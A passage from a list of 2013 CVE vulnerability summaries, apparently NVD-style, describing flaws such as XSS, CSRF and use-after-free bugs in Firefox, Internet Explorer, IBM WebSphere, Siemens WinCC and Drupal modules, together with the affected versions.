script, as demonstrated by a phishing attack on an HTTPS site. [CVE-2013-0775] Use-after-free vulnerability in the nsImageLoadingContent::OnStopContainer function in Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 allows remote attackers to execute arbitrary code via crafted web script. [CVE-2013-0773] The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) implementations in Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 do not prevent modifications to a prototype, which allows remote attackers to obtain sensitive information from chrome objects or possibly execute arbitrary JavaScript code with chrome privileges via a crafted web site. [CVE-2013-0765] Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey before 2.16 do not prevent multiple wrapping of WebIDL objects, which allows remote attackers to bypass intended access restrictions via unspecified vectors. [CVE-2013-0763] Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.1, Thunderbird before 17.0.2, Thunderbird ESR 17.x before 17.0.1, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via vectors related to Mesa drivers and a resized WebGL canvas. [CVE-2013-0756] Use-after-free vulnerability in the obj_toSource function in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via a crafted web page referencing JavaScript Proxy objects that are not properly handled during garbage collection. [CVE-2013-0753] Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content. [CVE-2013-0730] Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x through 4.1.0 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) language parameter to application/modules/admin/controllers/LanguagesController.php or (2) user parameter to application/modules/admin/controllers/UserController.php. [CVE-2013-0726] Stack-based buffer overflow in the ERM_convert_to_correct_webpath function in ermapper_u.dll in ERDAS ER Viewer before 13.00.0001 allows remote attackers to execute arbitrary code via a crafted pathname in an ERS file. [CVE-2013-0717] Multiple cross-site request forgery (CSRF) vulnerabilities in the web-based management utility on the NEC AtermWR9500N, AtermWR8600N, AtermWR8370N, AtermWR8160N, AtermWM3600R, and AtermWM3450RN routers allow remote attackers to hijack the authentication of administrators for requests that (1) initialize settings or (2) reboot the device. [CVE-2013-0716] The web server in Wind River VxWorks 5.5 through 6.9 allows remote attackers to cause a denial of service (daemon crash) via a crafted URI. [CVE-2013-0715] The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows remote authenticated users to cause a denial of service (CLI session crash) via a crafted command string. [CVE-2013-0709] Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled during display of the access log. [CVE-2013-0708] Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled during display of the access log. [CVE-2013-0703] Cross-site scripting (XSS) vulnerability in imgboard.com imgboard before 1.22R6.1 u and 20xx before 2010u allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0702] Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 through 3.5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0688] Cross-site scripting (XSS) vulnerability in Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, and 5.0- Portal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0680] Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. [CVE-2013-0679] Directory traversal vulnerability in the web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, allows remote authenticated users to read arbitrary files via vectors involving a query for a pathname. [CVE-2013-0678] Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, does not properly represent WebNavigator credentials in a database, which makes it easier for remote authenticated users to obtain sensitive information via a SQL query. [CVE-2013-0677] The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, allows remote attackers to obtain sensitive information or cause a denial of service via a crafted project file. [CVE-2013-0676] Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, does not properly assign privileges for the database containing WebNavigator credentials, which allows remote authenticated users to obtain sensitive information via a SQL query. [CVE-2013-0672] Cross-site scripting (XSS) vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to inject arbitrary web script or HTML via unspecified data. [CVE-2013-0671] Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to read HMI web-application source code and user-defined scripts via a crafted URL. [CVE-2013-0670] CRLF injection vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a crafted URL. [CVE-2013-0669] The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to cause a denial of service (daemon crash) via a crafted HTTP request. [CVE-2013-0668] Multiple cross-site scripting (XSS) vulnerabilities in the HMI web application in Siemens WinCC (TIA Portal) 11 allow remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0667] Cross-site scripting (XSS) vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0659] The debugging feature on the Siemens CP 1604 and CP 1616 interface cards with firmware before 2.5.2 allows remote attackers to execute arbitrary code via a crafted packet to UDP port 17185. [CVE-2013-0656] Buffer overflow in a third-party ActiveX component in Siemens SIMATIC RF-MANAGER 2008, and RF-MANAGER Basic 3.0 and earlier, allows remote attackers to execute arbitrary code via a crafted web site. [CVE-2013-0654] CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to execute arbitrary commands or cause a denial of service (daemon crash) via a crafted packet. [CVE-2013-0653] Directory traversal vulnerability in substitute.bcl in the WebView CimWeb subsystem in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to read arbitrary files via a crafted packet. [CVE-2013-0651] The Portal installation process in GE Intelligent Platforms Proficy Real-Time Information Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to read configuration files, and discover data-source credentials, via a direct request. [CVE-2013-0648] Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0600] Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance devices 2.0 and 2.1 through 2.1 FP3 allows remote attackers to bypass authentication and perform administrative actions via unknown vectors. [CVE-2013-0582] Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.12, 6.2.1 before 6.2.1.5, and 6.2.2 before 6.2.2.4 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.12 and 6.2.1 before 6.2.1.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL that triggers a SAML 2.0 response. [CVE-2013-0581] Multiple cross-site scripting (XSS) vulnerabilities in IBM Business Process Manager (BPM) 7.5.1.x, 8.0.0.x, and 8.0.1 before FP1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) ProcessPortal/jsp/socialPortal/dashboard.jsp, (2) teamworks/executeServiceByName, (3) portal/jsp/viewAdHocReportWizard.do, or (4) rest/bpm/wle/v1/process. [CVE-2013-0576] Cross-site scripting (XSS) vulnerability in the Tivoli Enterprise Portal browser client in IBM Tivoli Monitoring 6.2.0 through FP03, 6.2.1 through FP04, 6.2.2 through FP09, and 6.2.3 through FP02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0571] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0569] Cross-site scripting (XSS) vulnerability in the Communities component in IBM Connections 4.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0565] Cross-site scripting (XSS) vulnerability in the RPC adapter for the Web 2.0 and Mobile toolkit in IBM WebSphere Application Server (WAS) 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted response. [CVE-2013-0553] The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as used in Sametime Connect client, Sametime Advanced Connect client, Sametime Advanced Web client, and other products, allows remote authenticated users to send commands to individual chat users, or to all participants in a chat room, via a crafted Sametime Instant Message (IM). [CVE-2013-0549] Cross-site scripting (XSS) vulnerability in the Web Content Manager - Web Content Viewer Portlet in the server in IBM WebSphere Portal 7.0.0.x through 7.0.0.2 CF22 and 8.0.0.x through 8.0.0.1 CF5, when the IBM Portlet API is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0548] Multiple cross-site scripting (XSS) vulnerabilities in the Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 through FP3, 6.2.1 through FP4, 6.2.2 through FP9, and 6.2.3 before FP3, as used in IBM Application Manager for Smart Business (formerly Tivoli Foundations Application Manager) 1.2.1 before 1.2.1.0-TIV-IAMSB-FP0004 and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0544] Directory traversal vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux and UNIX allows remote authenticated users to modify data via unspecified vectors. [CVE-2013-0543] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux, Solaris, and HP-UX, when a Local OS registry is used, does not properly validate user accounts, which allows remote attackers to bypass intended access restrictions via unspecified vectors. [CVE-2013-0542] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via crafted field values. [CVE-2013-0541] Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Windows, when a localOS registry is used in conjunction with WebSphere Identity Manger (WIM), allows local users to cause a denial of service (daemon crash) via unspecified vectors. [CVE-2013-0540] IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5.0.2, when SSL is not enabled, does not properly validate authentication cookies, which allows remote authenticated users to bypass intended access restrictions via an HTTP session. [CVE-2013-0538] Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before Interim Fix 1 allows remote attackers to inject arbitrary web script or HTML via a SCRIPT element in an HTML e-mail message, aka SPRs JMOY95BLM6 and JMOY95BN49. [CVE-2013-0535] Multiple cross-site scripting (XSS) vulnerabilities in the Classic Meeting Server in IBM Sametime 7.5.1.2 through 8.5.2.1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0533] Cross-site scripting (XSS) vulnerability in the Sametime Links server in IBM Sametime 8.0.2 through 8.5.2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0525] Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes 8.5.x allow local users to inject arbitrary web script or HTML via a shared mail file, aka SPR DKEN8PDNTX. [CVE-2013-0523] IBM WebSphere Commerce Enterprise 5.6.x through 5.6.1.5, 6.0.x through 6.0.0.11, and 7.0.x through 7.0.0.7 does not use a suitable encryption algorithm for storefront web requests, which allows remote attackers to obtain sensitive information via a padding oracle attack that targets certain UTF-8 processing of the krypto parameter, and leverages unspecified browser access or traffic-log access. [CVE-2013-0519] IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fix 1, 3.4.0 before 3.4.0.6 Interim Fix 1, and 3.4.1 before 3.4.1.7 provides web-server version data in (1) an unspecified page title and (2) an unspecified HTTP header field, which allows remote attackers to obtain potentially sensitive information by reading a version string. [CVE-2013-0518] IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fix 1, 3.4.0 before 3.4.0.6 Interim Fix 1, and 3.4.1 before 3.4.1.7 does not refuse to be rendered in different-origin frames, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. [CVE-2013-0512] Stack-based buffer overflow in the Manual Explore browser plug-in for Firefox in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allows remote attackers to cause a denial of service (plug-in crash) via a crafted web page. [CVE-2013-0506] Cross-site scripting (XSS) vulnerability in IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 before HF69, 9.1.0 before FP41, and 9.2.0 before FP13 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0503] Cross-site scripting (XSS) vulnerability in the Bookmarks component in IBM Lotus Connections before 4.0 CR3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0502] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information Server 8.1, 8.5 through FP3, 8.7 through FP2, and 9.1 allows remote attackers to inject arbitrary web script or HTML via a malformed URL. [CVE-2013-0501] The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edraw Office Viewer Component, the client in IBM Cognos Disclosure Management (CDM) 10.2.0, and other products, allows remote attackers to read arbitrary files, or download an arbitrary program onto a client machine and execute this program, via a crafted web site. [CVE-2013-0499] Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services. [CVE-2013-0492] Cross-site scripting (XSS) vulnerability in IBM Informix Open Admin Tool (OAT) 2.x and 3.x before 3.11.1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0489] Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka the Web Administrator client) in IBM Domino 8.5.x allows remote authenticated users to hijack the authentication of administrators. [CVE-2013-0488] Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web Administrator client) in IBM Domino 8.5.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0482] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 through 8.5.0.2 and WebSphere Message Broker 6.1, 7.0 through 7.0.0.5, and 8.0 through 8.0.0.2, when WS-Security is used, allows remote attackers to spoof the signatures of messages via a crafted SOAP message, related to a "Signature Wrap attack," a different vulnerability than CVE-2011-1377 and CVE-2013-0489. [CVE-2013-0478] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data Management - Collaborative Edition 10.0 and 10.1 before FP1 and InfoSphere Master Data Management Server for Product Information Management 6.0, 9.0, and 9.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0474] The Manual Explore browser plug-in in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allows remote attackers to discover test Platform Authentication credentials via a crafted web site. [CVE-2013-0473] Multiple cross-site scripting (XSS) vulnerabilities in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allow remote attackers to inject arbitrary web script or HTML via a crafted report. [CVE-2013-0472] The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 before 6.3.1.0 and 6.4 before 6.4.0.1 allows man-in-the-middle attackers to obtain unspecified client access, and consequently obtain unspecified server access, via unknown vectors. [CVE-2013-0468] Cross-site scripting (XSS) vulnerability in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2013-2983. [CVE-2013-0466] Cross-site scripting (XSS) vulnerability in IBM WebSphere Message Broker 7.0 before 7.0.0.6 and 8.0 before 8.0.0.2, when wsdl support is enabled on a SOAPInput node, allows remote attackers to inject arbitrary web script or HTML via a wsdl request that is not properly handled during construction of an error message. [CVE-2013-0465] Unspecified vulnerability in the IBM WebSphere Cast Iron physical and virtual appliance 6.0 and 6.1 before 6.1.0.15 and 6.3 before 6.3.0.1, when LDAP authentication is enabled, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors. [CVE-2013-0464] Multiple cross-site scripting (XSS) vulnerabilities in IBM Eclipse Help System (IEHS) 3.4.3 and 3.6.2, as used in IBM SPSS Data Collection 6.0, 6.0.1, and 7.0, allow remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0462] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1, 7.0 before 7.0.0.27, 8.0, and 8.5 has unknown impact and attack vectors. [CVE-2013-0461] Cross-site scripting (XSS) vulnerability in the virtual member manager (VMM) administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0460] Cross-site request forgery (CSRF) vulnerability in the portlet subsystem in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47 and 7.0 before 7.0.0.27 allows remote attackers to hijack the authentication of arbitrary users for requests that insert cross-site scripting (XSS) sequences. [CVE-2013-0459] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0458] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2, when login security is disabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0457] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials 7.5, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to a uisessionid. [CVE-2013-0455] Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2.4 and Sterling File Gateway allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0453] Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli Endpoint Manager (TEM) before 8.2.1372 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0452] Cross-site request forgery (CSRF) vulnerability in the Software Use Analysis (SUA) application before 1.3.3 in IBM Tivoli Endpoint Manager 8.2 allows remote attackers to hijack the authentication of arbitrary users via a web site that contains crafted Flash Action Message Format (AMF) messages. [CVE-2013-0416] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-2403. [CVE-2013-0328] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.502 and LTS before 1.480.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0325] Multiple cross-site scripting (XSS) vulnerabilities in the Varnish module 6.x-1.x before 6.x-1.2 and 7.x-1.x before 7.x-1.0-beta2 for Drupal allow remote attackers to inject arbitrary web script or HTML via crafted a (1) Watchdog message or (2) admin setting. [CVE-2013-0324] Cross-site scripting (XSS) vulnerability in the Rendered links formatter in the Menu Reference module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the "Administer menus and menu items" permission to inject arbitrary web script or HTML via the menu link title. [CVE-2013-0323] Cross-site scripting (XSS) vulnerability in the Display Suite module 7.x-1.x before 7.x-1.7 and 7.x-2.x before 7.x-2.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the author field. [CVE-2013-0322] Cross-site scripting (XSS) vulnerability in Views in the Ubercart module 7.x-3.x before 7.x-3.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via the full name field. [CVE-2013-0321] Cross-site scripting (XSS) vulnerability in Views in the Ubercart Views (uc_views) module 6.x before 6.x-3.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the full name field. [CVE-2013-0319] Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module 6.x-1.x before 6.x-1.6 and 7.x-1.x before 7.x-1.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to the Yandex.Metrica service data. [CVE-2013-0317] Cross-site scripting (XSS) vulnerability in the Manager Change for Organic Groups (og_manager_change) module 7.x-2.x before 7.x-2.1 for Drupal might allow remote attackers to inject arbitrary web script or HTML via the username in the new manager autocomplete field. [CVE-2013-0305] The administrative interface for Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and 1.5 before release candidate 2 does not check permissions for the history view, which allows remote authenticated administrators to obtain sensitive object history information. [CVE-2013-0275] Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web before 3.5.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0259] Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with administer or edit boxes permissions to inject arbitrary web script or HTML via the subject parameter. [CVE-2013-0237] Cross-site scripting (XSS) vulnerability in Plupload.as in Moxiecode plupload before 1.5.5, as used in WordPress before 3.5.1 and other products, allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2013-0236] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) gallery shortcodes or (2) the content of a post. [CVE-2013-0227] Cross-site scripting (XSS) vulnerability in the Search API Sorts module 7.x-1.x before 7.x-1.4 for Drupal allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified field labels. [CVE-2013-0225] Cross-site scripting (XSS) vulnerability in the User Relationships module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.0-alpha5 for Drupal allows remote authenticated users with the "administer user relationships" permission to inject arbitrary web script or HTML via a relationship name. [CVE-2013-0218] The GUI installer in JBoss Enterprise Application Platform (EAP) and Enterprise Web Platform (EWP) 5.2.0 and possibly 5.1.2 uses world-readable permissions for the auto-install XML file, which allows local users to obtain the administrator password and the sucker password by reading this file. [CVE-2013-0214] Cross-site request forgery (CSRF) vulnerability in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to hijack the authentication of arbitrary users by leveraging knowledge of a password and composing requests that perform SWAT actions. [CVE-2013-0213] The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to conduct clickjacking attacks via a (1) FRAME or (2) IFRAME element. [CVE-2013-0205] Cross-site request forgery (CSRF) vulnerability in the RESTful Web Services (restws) module 7.x-1.x before 7.x-1.2 and 7.x-2.x before 7.x-2.0-alpha4 for Drupal allows remote attackers to hijack the authentication of arbitrary users via unknown vectors. [CVE-2013-0198] Dnsmasq before 2.66test2, when used with certain libvirt configurations, replies to queries from prohibited interfaces, which allows remote attackers to cause a denial of service (traffic amplification) via spoofed TCP based DNS queries. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3411. [CVE-2013-0181] Cross-site scripting (XSS) vulnerability in Views in the Search API (search_api) module 7.x-1.x before 7.x-1.4 for Drupal, when using certain backends and facets, allows remote attackers to inject arbitrary web script or HTML via unspecified input, which is returned in an error message. [CVE-2013-0142] QNAP VioStor NVR devices with firmware 4.0.3, and the Surveillance Station Pro component in QNAP NAS, have a hardcoded guest account, which allows remote attackers to obtain web-server login access via unspecified vectors. [CVE-2013-0129] Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before 4.17 allow remote authenticated users to inject arbitrary web script or HTML via (1) the WebFTP Overview "Create new directory" field or (2) the body of an e-mail autoresponder message. [CVE-2013-0125] Cross-site scripting (XSS) vulnerability in fileview.asp in C2 WebResource allows remote attackers to inject arbitrary web script or HTML via the File parameter. [CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability." [CVE-2013-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer removeChild Use After Free Vulnerability." [CVE-2013-0093] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer onBeforeCopy Use After Free Vulnerability." [CVE-2013-0092] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer GetMarkupPtr Use After Free Vulnerability." [CVE-2013-0091] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CElement Use After Free Vulnerability." [CVE-2013-0090] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CCaret Use After Free Vulnerability." [CVE-2013-0089] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability." [CVE-2013-0088] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer saveHistory Use After Free Vulnerability." [CVE-2013-0087] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability." [CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability." [CVE-2013-0030] The Vector Markup Language (VML) implementation in Microsoft Internet Explorer 6 through 10 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via a crafted web site, aka "VML Memory Corruption Vulnerability." [CVE-2013-0029] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CHTML Use After Free Vulnerability." [CVE-2013-0028] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CObjectElement Use After Free Vulnerability." [CVE-2013-0027] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CPasteCommand Use After Free Vulnerability." [CVE-2013-0026] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer InsertElement Use After Free Vulnerability." [CVE-2013-0025] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SLayoutRun Use After Free Vulnerability." [CVE-2013-0024] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer pasteHTML Use After Free Vulnerability." [CVE-2013-0023] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CDispNode Use After Free Vulnerability." [CVE-2013-0022] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability." [CVE-2013-0021] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer vtable Use After Free Vulnerability." [CVE-2013-0020] Use-after-free vulnerability in 